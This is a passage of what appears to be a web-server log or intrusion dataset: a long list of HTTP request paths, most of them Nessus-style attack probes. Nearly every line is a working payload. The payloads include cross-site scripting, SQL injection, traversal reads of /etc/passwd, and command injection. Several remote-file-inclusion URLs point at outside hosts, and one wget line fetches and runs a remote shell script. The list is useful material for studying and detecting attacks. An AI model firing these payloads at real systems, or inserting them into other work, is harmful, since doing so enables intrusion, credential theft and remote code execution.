content=\"testlwwz=718\">\n/b1q8bywu.mscgi?<script>cross_site_scripting.nasl</script>\n/b5xdqgz2.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"rm;q43131815&rem;\n/export.php?what=../../../../../../../../../../../../etc/passwd\\x00\n/8t9v8k7x.cfc?<script>document.cookie=\"testhvje=9403;\"</script>\n/javascript/.passwd.cnf\n/cgi-bin/book.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/byrg33fw.nsf?<script>document.cookie=\"testexuu=5340;\"</script>\n/main.php?logout=';rm q89385457 #\n/nuh3zirz.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/what's new rohs/\n/help.php?q=\"|ping;-w;7000;-n;1;4.3.2.1|rem;\n/3hlysl2x.htm?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/phpmyadmin/_mmserverscripts/mmhttpdb.php\n/script_archive/\n/en-us/account/search.php?submit=true&search=');\n/webcgi/c32web.exe/changeadminpassword\n/examples/jsp/checkbox/workarea/contentdesigner/ekformsiframe.aspx?id=\"><script>alert('nessus')</script>\n/../../../../../../../../../../../windows/win.ini\n/0z575z74.cfc?<script>document.cookie=\"testuhsv=9753;\"</script>\n/m4kkjf8l.jsp?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.118:8080/moclyxlwqyfjnp?\\x00\n/manager/index.php?search=<script>foo</script>\n/top.php?stuff='\\x0adel q94927894 #\n/examples/jsp/cal/index.php?cat_select=<script>foo</script>\n/ygkjkngd.dll?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/en-us/oie504mr.jsp?<script>document.cookie=\"testtpby=7052;\"</script>\n/examples/jsp/cal/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd\n/examples/jsp/jsp2/jspx/user.cgi?url=\"><script>alert(\"gossamer_links_url_xss.nasl\");</script>&from=add\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('echo+x;'); function v\n/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.118:8080/2aibfaczmac8?\\x00\n/examples/servlets/servlet/smpwservicescgi.exe\n/dda2qr7j.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\\x00\n/82q7ywa8.kspx?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/atgoarbcxk0+>+/dev/null+&'); function v\n/godwin's_law/\n/cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah\n/tuwjta1w.aspx?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/zuihld5m.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/ws_ftp.ini\n/bmeun223.idc?<script>document.cookie=\"testhhwu=7044;\"</script>\n/en-us/jnv890lt.php3?<script>cross_site_scripting.nasl</script>\n/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 735838347--\n/scripts/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_kd0agct9]));die;/*\n/zqqemp6j.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/index.php?id='union/**/select/**/0,0,706027059,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/en-us/account/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\\x00\n/0rufe52p.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,653954551,528677520,1,1,1,1,1--&blogid=1\n/main.php?stuff=;uname >q92696358 #\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/ftxarcvjda0+>+/dev/null+&').\"]=1\n/top.php?stuff='&rm q77845858 #\n/main.php?logout=\"&ver\\x09>q62572113&rem\\x09\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+68+65+74+00+00+68+73+6f+63+6b+68+65+63+74+00+68+63+6f+6e+6e+8b+dc+53+51+83++>>ctdn\n/main.php?logout=\"ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/jdx255ea.cgi?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/en-us/account/perl.exe?-v\n/phpwebfilemgr/index.php?f=../../../../../../../../../etc\n/search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=folder name\n/yef5f3d5.x?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/examples/servlets/servlet/misc/audio.php?recording=../version.inc\n/fc9t54l7.php?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/javascript/tomcat.exe\n/examples/jsp/num/webplus?script=/../../../../etc/passwd\n/javascript/rep.exe\n/cacti/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/subscriptions.ep\n/scripts/yfmo7jpwvpv1.sh\n/fo564rei.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"&ping\\x0b-w\\x0b9000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/en-us/dda2qr7j.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/5qnlm5z2.jspa?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/en-us/i686v90l.mscgi?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/scripts/www/delivery/ac.php?bannerid=-1331905039+or+1=1+--+';passthru(base64_decode($_server[http_nessus_lcnlbbuk]));die;/*\n/ygkjkngd.cfc?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/psynch/nph-psf.exe?css=http://192.168.202.118:8080/ghl9il?\n/amyloo's community car roll/\n/scripts/cevvxrxqxc_b.pl\n/manual/images/?c=s;o=a\n/rubrique.asp?no=`/etc/passwd`|55|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;`&#039;.\n/main.php?stuff=;del\\x09q62126743\\x09#\n/pbserver/..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/en-us/fo564rei.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/secure/register.php?next=\"><script>alert(414466083578)</script><\"\n/examples/jsp/cal/lib/dbman_filter.inc.php?lib_path=/etc/passwd\\x00\n/main.php?logout=\"&ver\\x09>q14643294&rem\\x09\n/top.php?stuff='sleep 7 #\n/top.php?stuff=\"\\x0auname >q36232773 #\n/scripts/index.php?mod_id=2&kb_ask=</textarea><script>alert(\"cerberus_support_center_mult_flaws.nasl\")</script>\n/j2kdmfw4.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ht8pn8uq.idc?<script>cross_site_scripting.nasl</script>\n/faq.php?action=&type=view&s=&id=-1' union select 0,181555201,0,0,0,0,0--\n/m2fpztty.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/components/com_mospray/scripts/admin.php?basedir=http://192.168.202.96:8080/txenjrxf3??&cmd=id\n/javascript/statistic.exe\n/recordings/web_store/web_store.cgi?page=../../../../../../etc/passwd\\x00.html\n/faq.php?action=&type=view&s=&id=-1' union select 0,1968195068,0,0,0,0,0--\n/scripts/wsnsa.dll/wservice=wsbroker1/webtools/oscommand.w\n/main.php?stuff=\"ping\\x0b-w\\x0b10000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/top.php?stuff=\"\\x0auname >q63768352 #\n/bzuf9ozq.html?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/includes/converter.inc.php?include_path=/etc/passwd\\x00\n/scripts/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/recordings/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- \n/examples/jsp/num/js/scripts.php?load=/etc/passwd\\x00\n/top.php?stuff='&uname >q28696513 #\n/solving all rapidshare's limitations/\n/en-us/account/cgi/tseekdir.cgi?location=/etc/passwd\\x00\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0174\\0044\\0000\\0377\\0347\" >> /tmp/gjvtlghpjb0;echo|awstats774939.txt\n/?<script>document.cookie=\"testiabz=5220;\"</script>\n/top.php?stuff=\"ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/um7xpn15.kspx?<script>document.cookie=\"testotoy=6142;\"</script>\n/main.php?stuff='&uname\\x09>q13569746\\x09#\n/en-us/w4996nr0.htm?<script>document.cookie=\"testttvs=7163;\"</script>\n/0u75ldxq.php?<script>cross_site_scripting.nasl</script>\n/n9xlumt5.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/search.jsp?q=%\"<script>alert(1331904374)</script>\n/main.php?stuff=\"ping\\x0c-w\\x0c8000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/main.php?stuff=uname\\x09>q65195584\\x09#\n/manager/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd\n/phpmyadmin/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='\n/o35zot2r.jsp?<script>cross_site_scripting.nasl</script>\n/quagynka.asp?<script>cross_site_scripting.nasl</script>\n/<script>document.cookie=\"testabrn=6368;\"</script>\n/cgi-exe/ion-p?page=../../../../../etc/passwd\n/main.php?stuff=\"\\x0drm q25775847 #\n/examples/jsp/colors/perl.exe?-v\n/en-us/odzk29aa.cfm?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/mail.php?id='/**/union/**/select/**/1,2,1331908741,4--&blog=1\n/issue/createissue.aspx?rtcdescription$radeditor1=1><script>alert(414175590323);</script>\n/main.php?logout='\\x0drm\\x09q39919215\\x09#\n/javascript/grant.exe\n/tuwjta1w.html?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/xlj7h65o.idc?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/basilix.php3?request_id[dummy]=../../../../etc/passwd&requestid=dummy&username=sec&password=secu\n/h21y8w52.php?<script>cross_site_scripting.nasl</script>\n/bmeun223.aspx?<script>document.cookie=\"testhhwu=7044;\"</script>\n/examples/jsp/colors/js/vendors.php?file=../../../../../../../../../../etc/passwd\\x00nessus.js\n/cgi-bin/index.php?id=0rop9yeuxw'\n/zqqemp6j.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/~guest.exe\n/examples/jsp/error/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold\n/h4bi26jd.cfc?<script>document.cookie=\"testhrzx=1150;\"</script>\n/a0imiuf1.jspa?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/main.php?logout=\"&rm\\x09q22899423\\x09#\n/pingtest.exe/\n/top.php?stuff=\"\\x0ddel q93764844 #\n/cacti/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login\n/script/_conf/core/common-tpl-vars.php?confdir=http://192.168.202.118:8080/ghl9il??\n/examples/jsp/colors/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script>\n/skitt's_law/\n/6qbynt4f.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=;uname\\x09>q81281166\\x09#\n/awstats/awstats.pl?migrate=|echo;/./tmp/urcppbumwm0 > /dev/null &;echo|awstats157453.txt\n/examples/jsp/jsp2/jspx/index.php?id=urjhxcl19w'\n/cgi-win/cgitest.exe\n/azcrfs8d.cfm?<script>document.cookie=\"testjpdr=9205;\"</script>\n/scripts/shop.plx/page=nessus1587302768\n/zv8tv7h8.jsp?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/aj3pf49c.jspa?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php&frm_user=&scr_height=&scr_width=q46613374\n/top.php?stuff=;uname >q54934318 #\n/5o9zq43e.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:\n/weq93ppb.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/display.cgi?preftemp=temp&page=anonymous&file=|id|\n/zv8tv7h8.pl?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/l13b77e5.cgi?<script>document.cookie=\"testjvvf=7721;\"</script>\n/scripts/sitemap.scr.php?globals[pth][classes]=@rfiurl\n/h5i6crm3.nsf?<script>document.cookie=\"testlihk=7070;\"</script>\n/javascript/folders.exe\n/webcgi/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/azcrfs8d.jsp?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/forum_arc.asp?n=/etc/passwd\\x00|36|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;/&#039;.\n/examples/jsp/num/port.php?proto=tcp'\n/examples/jsp/jsp2/jspx/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@\n/0w155a7c.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff='rm\\x09q54162214\\x09#\n/examples/jsp/security/protected/.j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee61893221447.swp\n/webdav/c99.php?act=f&f=phonehome_script.exe&d=c:\\xampp\\webdav&\n/cgi-bin/index.php?chemin=../../../../../../..//etc\n/main.php?stuff=\"&rm\\x0cq99279396&rem\\x0c\n/examples/jsp/cal/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo\n/setpasswd.cgi\n/javascript/intelligence.exe\n/qczkquis.aspx?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/0z575z74.html?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/newfederalediscoveryrulestranscript/\n/m5103snj.fts?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/webplus?script=/../../../../etc/passwd\n/examples/jsp/error/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/examples/jsp/jsp2/jspx/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/scripts/index.php?cat='\n/3hlysl2x.fts?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/frontend/x3/htaccess/dohtaccess.html?dir=><script>alert(412936083493)</script>\n/scripts/admin/adminlogin.asp\n/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1420911431--\n/examples/jsp/sessionssearch_results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+08+00+60+89+e5+52+56+57+6a+02+6a+6c+68+6c+2e+64+6c+68+6e+74+64+6c+54+ff+54++>>ctdn\n/en-us/account/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\\x00\n/javascript/htpasswd.zip\n/help.php?q=\"&ver >q71917693&rem \n/examples/jsp/sessions/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd\n/zmvq66jy.idc?<script>cross_site_scripting.nasl</script>\n/javascript/document.htm\n/phpmyadmin/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd\n/main.php?stuff=\"ver&rem \n/nyjgaorz.php3?<script>cross_site_scripting.nasl</script>\n/40;15531244/\n/javascript/firewall.exe\n/news.php?scriptpath=http://192.168.202.96:8080/4dckqcc0acprbz??\n/0z575z74.aspx?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/zroo33l4.exe?<script>document.cookie=\"testiklc=904;\"</script>\n/m5103snj.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"\\x0drm\\x09q41994252\\x09#\n/top.php?stuff=\"del\\x0cq31638645&rem\\x0c\n/7u1pb2xi.fts?<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/ht8pn8uq.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/mysubscriptions/\n/javascript/.passwd.rtf\n/fnwhrxyd.fts?<script>cross_site_scripting.nasl</script>\n/ddoworrl.mscgi?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/main.php?stuff=&ping;-w;8000;-n;1;4.3.2.1&rem;\n/netget?sid=safety&amp;msg=2002&amp;file=safety\n/cgi-win/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/main.php?stuff=\"ping\\x0b-w\\x0b9000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/cgi-915/gwweb.exe?help=bad-request\n/cgi-bin/ion-p.exe?page=c:\\\\winnt\\\\win.ini\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=dwp2thlcurfbug01i\n/examples/jsp/error/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini\n/main.php?logout=\"&ping\\x09-w\\x099000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/examples/servlets/servlet/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\\x00\n/sources/functions.php?root_path=/etc/passwd\\x00\n/main.php?stuff='&uname >q83741819 #\n/examples/jsp/jsp2/jspx/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435\n/top.php?stuff='del q33698181 #\n/main.php?stuff=del;q96335299&rem;\n/examples/jsp/cal/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\\x00\n//document.writeln(unescape(\"%3cscript src=%27http://www.example.com/test?rnd=q51448888%27><\"+string.fromcharcode(0x2f)+\"script>\"))\n/javascript/jmxsoapadapter.exe\n/jscript/\n/bl8sefdm.jspa?<script>cross_site_scripting.nasl</script>\n/scripts/tools/ctss.idc\n/awstats/awstats.pl?migrate=|echo;wget -p /tmp/  http://192.168.202.102:80/awseggjskmps6s1qjubwshcaccrgaa/cegnlginfc.sh;echo|awstats155062.txt\n/book-description/\n/169okeyj.php3?<script>document.cookie=\"testxeoi=3573;\"</script>\n/examples/jsp/num/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/main.php?logout='&sleep\\x098\\x09#\n/main.php?frm_daynight=q91441239&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php%3fstuff%3d1861731255&frm_user=&scr_height=&scr_width=\n/j2kdmfw4.htm?<script>cross_site_scripting.nasl</script>\n/vwmg565s.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/doctype.exe\n/scripts/lce0cbkfb8xx.asp\n/9kr0ih0v.idc?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/bn857frh.aspx?<script>cross_site_scripting.nasl</script>\n<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/6qbynt4f.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/document.trace\n/examples/jsp/cal/include/theme.inc.php?fullpath=/etc/passwd\\x00\n/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/bzuf9ozq.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/9o6g5vkn.pl?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/shopaddtocart.asp?productid='42\n/main.php?logout=\";uname\\x09#\n/manager/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd\n/javascript/turbine.exe\n/main.php?logout=\"|ping -w 10000 -n 1 4.3.2.1|rem \n/examples/jsp/error/rss.php?blogid=1&profile=../../config/config.properties.php\\x00\n/prescription-troches/\n/main.php?stuff=rm;q96335299&rem;\n/scripts/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\\x00\n/l752x1ry.php?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=&ver\\x09>q39983991&rem\\x09\n/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1\n/top.php?stuff=\"ping\\x0b-w\\x0b8000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/_scriptlibrary/\n/en-us/fo564rei.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/xfkun1ku.idc?<script>cross_site_scripting.nasl</script>\n/scripts/event_view.php?eid=34 union select 610245698\n/9ko6m4c8.exe?<script>document.cookie=\"testylik=3403;\"</script>\n/scripts/qcvjnagy16kc.php3\n/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee61997061463.bak\n/vmi8bb12.htm?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/scripts/projects_site/uploadfile.php?demosession=1\n/cgibin/query?mss=../config\n/top.php?stuff=;rm q54934318 #\n/examples/jsp/num/index.php?name=your account&profile=anyone\"><script>alert('nessus was here');</script>\n/examples/jsp/checkbox/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\\x00\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=q87746127&frm_user=&scr_height=&scr_width=\n/weq93ppb.exe?<script>cross_site_scripting.nasl</script>\n/manager/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/examples/jsp/sessions/index.php?string='\n/script/plugins/phpgacl/admin/index.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/examples/jsp/jsp2/jspx/main.php?g2_itemid=../../../../../license\\x00\n/ht8pn8uq.nsf?<script>cross_site_scripting.nasl</script>\n/scripts/htgrep/file=index.html&hdr=/etc/passwd\n/forum.asp?n=/etc/passwd|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;/&#039;.\n/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.118:8080/zz5thkvtmlgl?\n/hydrocodonevicodinwithoutprescription/\n/n1afe1y6.cgi?<script>cross_site_scripting.nasl</script>\n//document.writeln(unescape(\"%3cscript src=%27http://www.example.com/test?rnd=q73518413%27><\"+string.fromcharcode(0x2f)+\"script>\"))\n/recordings/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\\x00\n/cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/num/index.php?module=<script>foo</script>\n/examples/jsp/cal/index.php?search=<script>foo</script>\n/t7tm4m0b.dll?<script>cross_site_scripting.nasl</script>\n/cgi-win/gw5/gwweb.exe?htmlver=aaa&get-context\n/recordings/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd\n/javascript/.passwd.dat\n/manager/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script\n/main.php?logout=\"&ping,-w,10000,-n,1,4.3.2.1&rem,\n/examples/jsp/jsp2/el/lang/lang.php?lang_path=/etc/passwd\\x00\n/scripts/index.php?configfile=../../../../../../../../../etc/passwd\n/main.php?logout=\";del\\x09q28427886\\x09#\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.28.202/main.php&frm_user=q37377551&scr_height=&scr_width=\n/?<script>cross_site_scripting.nasl</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+d7+93+ff+d7+95+83+c4+10+58+5a+59+53+55+50+8b+ec+50+57+52+56+6a+06+5a+eb+0e++>>ctdn\n/top.php?stuff=\"uname\\x09#\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.96:8080/swgnhpydbq0t??\n/vwmg565s.x?<script>cross_site_scripting.nasl</script>\n/cgi-bin/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold\n/help.php?q=\"&rm\\xa0q49941678&rem\\xa0\n/main.php?logout=\"ping,-w,7000,-n,1,1.2.3.4|rem,\n/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331909400,244455451 -- \n/scripts/vzdybnanqpc3.php3\n/javascript/jennifer.exe\n/main.php?stuff=\"&del q86234546&rem \n/recordings/phpnews/sendtofriend.php?mid='1'\n/help.php?q=ver\\x09>q75579332&rem\\x09\n/help.php?q=\"&rm\\xa0q59981564&rem\\xa0\n/byrg33fw.kspx?<script>document.cookie=\"testexuu=5340;\"</script>\n/igtf0zon.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd\n/javascript/signing.exe\n/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.96:8080/frznctvhi0i5?'\n/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331905213,113095511 -- \n/h5i6crm3.cfc?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/en-us/account/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|\n/myspacewormnewxss2/\n/bemarket/postscript/postscript.php?p_mode=http://192.168.202.96:8080/ipb5ri?\n/javascript/car.exe\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331923189&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/yef5f3d5.fts?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/examples/jsp/jsp2/el/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\\x00\n/recordings/file.php?path=/etc/passwd\\x00\n/javascript/category.exe\n/main.php?stuff=\"del\\x09q32749899&rem\\x09\n/examples/jsp/cal/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/scs86g1p.do?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/javascript/tracking.exe\n/help.php?q='\\x0ddel q17837735 #\n/scripts/search.jsp?q=%\"<script>alert(1331909235)</script>\n/zoomstats/libs/dbmax/mysql.php?globals['lib']['db']['path']=http://192.168.202.118:8080/zz5thkvtmlgl??\n/src/scripture.php?pageheaderfile=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/p043snfr.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/numsearch-results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/en-us/static/app/gettingstarted/../../../../../../../../../..//etc/passwd\n/javascript/.passwd.save\n/_vti_bin/..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/cgi-bin/cgiip.exe/wservice=wsbroker1/webutil/ping.p\n/cgi-exe/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/<$blogitempermalinkurl$>/\n/sys/code/box.inc.php?config[\"sipssys\"]=http://192.168.202.118:8080/zz5thkvtmlgl?\n/0rufe52p.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/index.php?src=1&_common=1&time=1331904460&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/cacti/resetpw.php?email=../../../../../../../../../../../../etc/passwd\n/s7qus4g3.cgi?<script>cross_site_scripting.nasl</script>\n/javascript/element.exe\n/baldur's/\n/d44uk9h2.cfm?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/scripts/lpzj75ztw9lb.sh\n/scripts/cxvae_g3rjys.inc\n/top.php?stuff=\"\\x0ddel\\x09q41641295\\x09#\n/emailsubscriptions/\n/main.php?logout=\"&del q83422114 #\n/help.php?q=\"&ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/qhvu0pdg.mscgi?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/fpnpp5zg.do?<meta http-equiv=set-cookie content=\"testyias=101\">\n/components/com_mospray/scripts/admin.php?basedir=http://192.168.202.118:8080/ghl9il??&cmd=id\n/xsqln7eb.jsp?<script>document.cookie=\"testpcbb=9254;\"</script>\n/examples/jsp/colors/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/scripts/udblphlq4nln.shtml\n/national lampoon's van wilder the rise of taj cam kvcd/\n/examples/jsp/num/texis.exe/?-dump\n/scripts/c100.php\n/phpmyadmin/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@\n/main.php?stuff=\"ping -w 9000 -n 1 1.2.3.4|rem \n/cgi-bin/index.php?op=default&date=200607' union select 1,1764635809,1,1,1,1,1,1,1,1--&blogid=1\n/vmi8bb12.asp?<script>document.cookie=\"testlerc=2575;\"</script>\n/examples/jsp/sessions/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params\"having 1=1\n/examples/jsp/error/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\\x00\n/examples/jsp/colors/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/ows-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/cullodfxkf.sh'); function v\n/main.php?stuff=\"&del q54323675&rem \n/7u1pb2xi.dll?<meta http-equiv=set-cookie 